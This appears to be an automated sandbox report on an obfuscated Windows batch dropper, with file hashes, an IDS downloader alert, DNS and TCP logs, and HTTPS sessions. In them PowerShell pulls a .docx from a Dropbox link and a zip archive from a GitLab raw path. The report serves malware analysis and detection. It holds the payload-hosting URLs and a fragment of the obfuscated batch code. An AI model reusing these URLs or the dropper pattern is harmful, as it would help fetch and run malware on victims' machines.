                                                                                                                                                                                  SHA256:05591be36639ad9296f45115fe68976e53ea744ba87ab927c9d129e0822988d1
                                                                                                                                                                                  SHA512:efdef69cd2d65628c92dd8a35ff8c31b7f938d4452bd688ebc659ceac2bb422c9cd1342b52c2969aa7a3fb41c3a57d5928f519cdec985f2bde1bb37b375610c2
                                                                                                                                                                                  SSDEEP:384:eJa4u+bRXAjNdEYMgJJybsxby36w4X8MQ0uELWP3sN1rf:0awbRCNOYZ8bs036w4X8v0uBPU9
                                                                                                                                                                                  TLSH:7EE2E55C27577DDF6366D1229178A4A168F6A8FD22BEAA278B347C7C4FB006B4C35130
                                                                                                                                                                                  File Content Preview:....>nul 2>&1 &cls.@@ec%.........^.........%h%...^...............%%.........^.........%^o of^%(.........^)(.........)(.........)(........)...( ..._...)......(......_...)...%%...(......_...)...(........)(.........)...(...^..._...)...(.........)(.........)%

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:9686878b929a9886

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                  2024-11-18T08:47:24.268623+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549755172.65.251.78443TCP

                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Nov 18, 2024 08:47:16.517595053 CET49721443192.168.2.5162.125.66.18
                                                                                                                                                                                  Nov 18, 2024 08:47:16.517648935 CET44349721162.125.66.18192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:16.517719030 CET49721443192.168.2.5162.125.66.18
                                                                                                                                                                                  Nov 18, 2024 08:47:16.527568102 CET49721443192.168.2.5162.125.66.18
                                                                                                                                                                                  Nov 18, 2024 08:47:16.527587891 CET44349721162.125.66.18192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:17.382726908 CET44349721162.125.66.18192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:17.382822990 CET49721443192.168.2.5162.125.66.18
                                                                                                                                                                                  Nov 18, 2024 08:47:17.384620905 CET49721443192.168.2.5162.125.66.18
                                                                                                                                                                                  Nov 18, 2024 08:47:17.384629965 CET44349721162.125.66.18192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:17.385072947 CET44349721162.125.66.18192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:17.399154902 CET49721443192.168.2.5162.125.66.18
                                                                                                                                                                                  Nov 18, 2024 08:47:17.443344116 CET44349721162.125.66.18192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:18.358288050 CET44349721162.125.66.18192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:18.358391047 CET49721443192.168.2.5162.125.66.18
                                                                                                                                                                                  Nov 18, 2024 08:47:18.358412027 CET44349721162.125.66.18192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:18.358464956 CET49721443192.168.2.5162.125.66.18
                                                                                                                                                                                  Nov 18, 2024 08:47:18.358496904 CET44349721162.125.66.18192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:18.358556986 CET49721443192.168.2.5162.125.66.18
                                                                                                                                                                                  Nov 18, 2024 08:47:18.365175962 CET49721443192.168.2.5162.125.66.18
                                                                                                                                                                                  Nov 18, 2024 08:47:22.620367050 CET49749443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:22.620408058 CET44349749172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:22.620496035 CET49749443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:22.623298883 CET49749443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:22.623316050 CET44349749172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:23.239420891 CET44349749172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:23.239505053 CET49749443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:23.241210938 CET49749443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:23.241218090 CET44349749172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:23.241554022 CET44349749172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:23.252295971 CET49749443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:23.299334049 CET44349749172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:23.528611898 CET44349749172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:23.528692961 CET44349749172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:23.528788090 CET44349749172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:23.528791904 CET49749443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:23.528824091 CET44349749172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:23.528887033 CET44349749172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:23.528939009 CET49749443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:23.531143904 CET49749443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:23.531562090 CET49755443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:23.531615973 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:23.535027981 CET49755443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:23.535296917 CET49755443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:23.535326958 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:24.136740923 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:24.138734102 CET49755443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:24.138757944 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:24.268680096 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:24.268939018 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:24.269030094 CET49755443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:24.269037008 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:24.269068956 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:24.269231081 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:24.269290924 CET49755443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:24.269304037 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:24.269349098 CET49755443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:24.269354105 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:24.269526005 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:24.269714117 CET44349755172.65.251.78192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:24.269841909 CET49755443192.168.2.5172.65.251.78
                                                                                                                                                                                  Nov 18, 2024 08:47:24.274350882 CET49755443192.168.2.5172.65.251.78

                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Nov 18, 2024 08:47:16.503639936 CET5578553192.168.2.51.1.1.1
                                                                                                                                                                                  Nov 18, 2024 08:47:16.511266947 CET53557851.1.1.1192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:18.366739988 CET6127553192.168.2.51.1.1.1
                                                                                                                                                                                  Nov 18, 2024 08:47:18.382597923 CET53612751.1.1.1192.168.2.5
                                                                                                                                                                                  Nov 18, 2024 08:47:22.609148979 CET6231353192.168.2.51.1.1.1
                                                                                                                                                                                  Nov 18, 2024 08:47:22.616056919 CET53623131.1.1.1192.168.2.5

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Nov 18, 2024 08:47:16.503639936 CET192.168.2.51.1.1.10xe420Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 18, 2024 08:47:18.366739988 CET192.168.2.51.1.1.10xb9e3Standard query (0)ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 18, 2024 08:47:22.609148979 CET192.168.2.51.1.1.10xe53cStandard query (0)gitlab.comA (IP address)IN (0x0001)false

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Nov 18, 2024 08:47:16.511266947 CET1.1.1.1192.168.2.50xe420No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 18, 2024 08:47:16.511266947 CET1.1.1.1192.168.2.50xe420No error (0)www-env.dropbox-dns.com162.125.66.18A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 18, 2024 08:47:18.382597923 CET1.1.1.1192.168.2.50xb9e3No error (0)ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 18, 2024 08:47:18.382597923 CET1.1.1.1192.168.2.50xb9e3No error (0)edge-block-www-env.dropbox-dns.com162.125.66.15A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 18, 2024 08:47:22.616056919 CET1.1.1.1192.168.2.50xe53cNo error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false

                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                  • www.dropbox.com
                                                                                                                                                                                  • gitlab.com

                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.549721162.125.66.184432352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-18 07:47:17 UTC189OUTGET /scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1 HTTP/1.1
                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-11-18 07:47:18 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                  Content-Security-Policy: font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://*.dropbox.com ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropb [TRUNCATED]
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Location: https://ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.com/cd/0/get/Cel62Zb6Z6skuFAMIcLW6_-9x9nN_Vn_aZF2eygNBvyuWMEwBlmgpUwrIxmhabFuljppG5g1vZ3qT3V-YtH7j6g-z83wUZSkMkfFkEbczSydBQre0EAJlzNi24vWNV6AzsBY6QKLc5o1_0MEMGnubwEo/file?dl=1#
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                  Set-Cookie: gvc=MTY4Mzk5MTYyNDY0MjUwNjgyNzUxNDc1MjE0NDA0NzE1ODM0NzI1; Path=/; Expires=Sat, 17 Nov 2029 07:47:17 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                  Set-Cookie: t=zo0Z13rxBYcrv_YBNQS76uTS; Path=/; Domain=dropbox.com; Expires=Tue, 18 Nov 2025 07:47:17 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=zo0Z13rxBYcrv_YBNQS76uTS; Path=/; Expires=Tue, 18 Nov 2025 07:47:17 GMT; Secure; SameSite=None
                                                                                                                                                                                  Set-Cookie: __Host-ss=IrJ9_QIviI; Path=/; Expires=Tue, 18 Nov 2025 07:47:17 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sat, 17 Nov 2029 07:47:17 GMT
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                  Date: Mon, 18 Nov 2024 07:47:18 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                  X-Dropbox-Request-Id: e1ff9e90004a4339bcc5b1f39b6028e6
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  2024-11-18 07:47:18 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.549749172.65.251.784434336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-18 07:47:23 UTC95OUTGET /bosse21/mkt/-/raw/main/12Fukrun.zip HTTP/1.1
                                                                                                                                                                                  Host: gitlab.com
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-11-18 07:47:23 UTC169INHTTP/1.1 302 Found
                                                                                                                                                                                  Date: Mon, 18 Nov 2024 07:47:23 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  cache-control: no-cache
                                                                                                                                                                                  2024-11-18 07:47:23 UTC2340INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                  Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                  2024-11-18 07:47:23 UTC579INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4a 68 61 4c 6e 4b 6d 65 78 66 6b 4e 34 64 66 79 6e 65 51 25 32 42 76 5a 36 51 45 53 39 30 76 73 4d 4f 62 25 32 46 59 64 61 54 6e 68 35 54 6a 42 45 52 6d 31 50 49 31 49 33 4e 25 32 42 74 6b 7a 6b 6c 4c 25 32 42 5a 66 75 61 49 4f 66 79 31 4b 6f 57 5a 64 78 34 68 66 73 7a 62 57 57 31 45 6d 53 6b 39 44 58 6c 47 50 47 25 32 42 70 4a 51 38 6c 75 48 48 33 78 57 47 69 57 76 6a 63 6c 69 5a 4f 46 63 69 41 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                                                                                                                                                  Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JhaLnKmexfkN4dfyneQ%2BvZ6QES90vsMOb%2FYdaTnh5TjBERm1PI1I3N%2BtkzklL%2BZfuaIOfy1KoWZdx4hfszbWW1EmSk9DXlGPG%2BpJQ8luHH3xWGiWvjcliZOFciA%3D"}],"group":"cf-nel","max_age":604800}N
                                                                                                                                                                                  2024-11-18 07:47:23 UTC104INData Raw: 36 32 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 75 73 65 72 73 2f 73 69 67 6e 5f 69 6e 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: 62<html><body>You are being <a href="https://gitlab.com/users/sign_in">redirected</a>.</body></html>
                                                                                                                                                                                  2024-11-18 07:47:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.2.549755172.65.251.784434336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-18 07:47:24 UTC49OUTGET /users/sign_in HTTP/1.1
                                                                                                                                                                                  Host: gitlab.com
                                                                                                                                                                                  2024-11-18 07:47:24 UTC1279INHTTP/1.1 403 Forbidden
                                                                                                                                                                                  Date: Mon, 18 Nov 2024 07:47:24 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Content-Length: 8200
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                  Origin-Agent-Cluster: ?1
                                                                                                                                                                                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                  Referrer-Policy: same-origin
                                                                                                                                                                                  X-Content-Options: nosniff
                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                  cf-mitigated: challenge
                                                                                                                                                                                  2024-11-18 07:47:24 UTC780INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 4a 2f 79 69 4b 54 67 36 36 2b 52 62 62 54 62 73 2b 47 6b 52 4c 30 4a 7a 32 43 53 64 53 57 43 4a 54 58 42 32 78 77 32 43 6e 49 4b 63 32 49 73 4b 62 6d 77 47 75 4d 48 35 59 4f 6b 30 50 4c 61 62 53 49 44 35 34 4c 56 65 49 6f 61 38 74 54 74 37 71 74 42 73 72 61 6d 6d 4c 4c 49 2f 62 42 4a 75 71 7a 4c 72 74 66 32 74 6b 56 68 2b 73 50 2b 6d 55 67 4d 38 2b 63 65 75 61 39 6f 41 6e 56 42 67 4d 6b 39 4c 65 5a 5a 2f 33 70 55 6d 41 67 48 36 79 6f 46 37 5a 51 3d 3d 24 46 42 56 51 36 38 7a 6b 4a 6d 65 6e 45 52 55 31 50 51 37 6f 59 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                                                                                                                                                                  Data Ascii: cf-chl-out: J/yiKTg66+RbbTbs+GkRL0Jz2CSdSWCJTXB2xw2CnIKc2IsKbmwGuMH5YOk0PLabSID54LVeIoa8tTt7qtBsrammLLI/bBJuqzLrtf2tkVh+sP+mUgM8+ceua9oAnVBgMk9LeZZ/3pUmAgH6yoF7ZQ==$FBVQ68zkJmenERU1PQ7oYQ==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                                                                                                                                                                  2024-11-18 07:47:24 UTC679INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                                                                                                                                                  2024-11-18 07:47:24 UTC1369INData Raw: 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 7d 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65
                                                                                                                                                                                  Data Ascii: tent{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-te
                                                                                                                                                                                  2024-11-18 07:47:24 UTC1369INData Raw: 6e 61 67 65 64 27 2c 63 52 61 79 3a 20 27 38 65 34 36 35 61 32 63 34 65 34 62 32 63 62 61 27 2c 63 48 3a 20 27 58 50 4d 5a 71 37 39 7a 5a 53 42 68 33 79 50 5f 35 7a 43 70 69 4e 53 59 38 4d 74 79 50 39 72 43 4f 45 46 31 39 79 34 71 4f 47 34 2d 31 37 33 31 39 31 36 30 34 34 2d 31 2e 32 2e 31 2e 31 2d 37 52 4c 62 7a 37 54 4c 38 6d 74 35 78 34 76 77 4d 4b 4c 4e 56 42 76 6d 65 39 31 6e 5a 77 51 4c 63 46 55 36 43 53 37 7a 53 52 63 6e 6d 4a 73 79 4a 6c 31 6f 38 6d 4f 58 66 73 41 53 62 68 50 44 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 75 73 65 72 73 5c 2f 73 69 67 6e 5f 69 6e 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 41 34 35 39 4a 42 53 52 49 76 4b 6a 43 7a 6c 4f 6a 61 42 4d 68 47 4b 70 68 38 66 73 76 61 68 67 72 52 79 78 53 4b 52 62 49 59 6b 2d 31 37 33 31 39 31
                                                                                                                                                                                  Data Ascii: naged',cRay: '8e465a2c4e4b2cba',cH: 'XPMZq79zZSBh3yP_5zCpiNSY8MtyP9rCOEF19y4qOG4-1731916044-1.2.1.1-7RLbz7TL8mt5x4vwMKLNVBvme91nZwQLcFU6CS7zSRcnmJsyJl1o8mOXfsASbhPD',cUPMDTk: "\/users\/sign_in?__cf_chl_tk=A459JBSRIvKjCzlOjaBMhGKph8fsvahgrRyxSKRbIYk-173191
                                                                                                                                                                                  2024-11-18 07:47:24 UTC1369INData Raw: 59 48 4f 2e 50 57 70 2e 31 68 59 4c 61 59 45 78 38 54 77 2e 59 6f 6b 32 74 51 4a 4c 5f 44 66 4c 5a 35 34 64 46 6c 34 35 2e 37 37 75 63 57 2e 77 39 59 46 45 32 45 6d 37 70 51 43 4d 31 6b 69 33 32 30 48 48 5f 6f 78 6f 76 39 35 63 48 5f 51 4c 68 33 63 32 70 36 58 70 71 65 51 77 31 6a 6f 74 68 44 64 78 30 51 70 6c 47 69 47 37 68 6f 49 4f 6a 6b 46 51 6c 58 75 72 58 49 47 31 39 75 56 41 4f 6e 66 66 69 61 5a 76 4c 2e 74 5f 31 75 33 67 41 61 31 6b 64 37 69 34 61 5f 44 46 62 65 77 6e 66 4f 54 37 79 61 6c 56 6b 58 4a 62 54 54 41 66 6d 31 49 67 44 48 4c 54 59 77 56 64 59 56 69 7a 47 32 6b 6e 6a 45 47 34 76 42 61 64 74 32 36 46 43 48 74 63 57 71 5f 69 68 51 52 52 6a 74 79 4d 48 79 76 50 61 72 53 2e 2e 63 4c 4f 38 70 72 79 41 73 65 50 52 36 64 6e 45 4a 54 31 6e 54 69
